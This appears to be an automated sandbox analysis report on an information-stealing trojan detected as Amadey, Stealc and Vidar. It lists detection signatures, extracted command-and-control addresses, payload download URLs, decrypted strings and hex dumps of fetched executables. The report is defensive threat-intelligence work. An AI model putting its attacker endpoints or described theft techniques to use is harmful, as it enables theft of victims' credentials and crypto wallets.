Windows Analysis Report
tAa6xNsucX.exe

Overview

General Information

Sample name: tAa6xNsucX.exe
renamed because original name is a hash value
Original sample name: b034eecf4642c53db4eeb735c813bc27.exe
Analysis ID: 1463440
MD5: b034eecf4642c53db4eeb735c813bc27
SHA1: d6fef1943e0ccafbad7586dc4ecb1edf6c0707b3
SHA256: d23cadd6e905563f0dad2ad88ce087f7418641f43106f0816f68f66ab6f1f7e4
Tags: 32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: tAa6xNsucX.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll/O Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exephprefoxox Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllNLu Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/I Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpm32 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpo Avira URL Cloud: Label: phishing
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpD Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpE Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll#L Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll0L Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explortu.exe.5004.9.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://147.45.47.155/ku4Nor9/index.php"]}
Source: tAa6xNsucX.exe.6532.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 26% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://147.45.47.155/ku4Nor9/index.php Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://147.45.47.155/I Virustotal: Detection: 5% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 18% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Virustotal: Detection: 21% Perma Link
Source: 85.28.47.4/920475a59bac849d.php Virustotal: Detection: 18% Perma Link
Source: http://77.91.77.81/cost/go.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Virustotal: Detection: 9% Perma Link
Source: http://85.28.47.4 Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: tAa6xNsucX.exe Virustotal: Detection: 43% Perma Link
Source: tAa6xNsucX.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: tAa6xNsucX.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: lstrcatA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: OpenEventA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CreateEventA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CloseHandle
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: Sleep
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: VirtualFree
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: lstrlenA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: ExitProcess
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: user32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CreateDCA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: sscanf
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: HAL9TH
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: JohnDoe
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: DISPLAY
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: default
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GlobalLock
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: HeapFree
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetFileSize
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GlobalSize
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: Process32Next
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: Process32First
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: LocalFree
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: FindClose
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: ReadFile
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: WriteFile
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CreateFileA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CopyFileA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetLastError
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GlobalFree
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: OpenProcess
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: ole32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: wininet.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: shell32.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: psapi.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: SelectObject
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: BitBlt
Source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C326C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C326C80
Uses 32bit PE files
Source: tAa6xNsucX.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: tAa6xNsucX.exe, 00000000.00000002.2340937251.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: tAa6xNsucX.exe, 00000000.00000002.2340937251.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.5:49705
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.5:49705
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 147.45.47.155
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 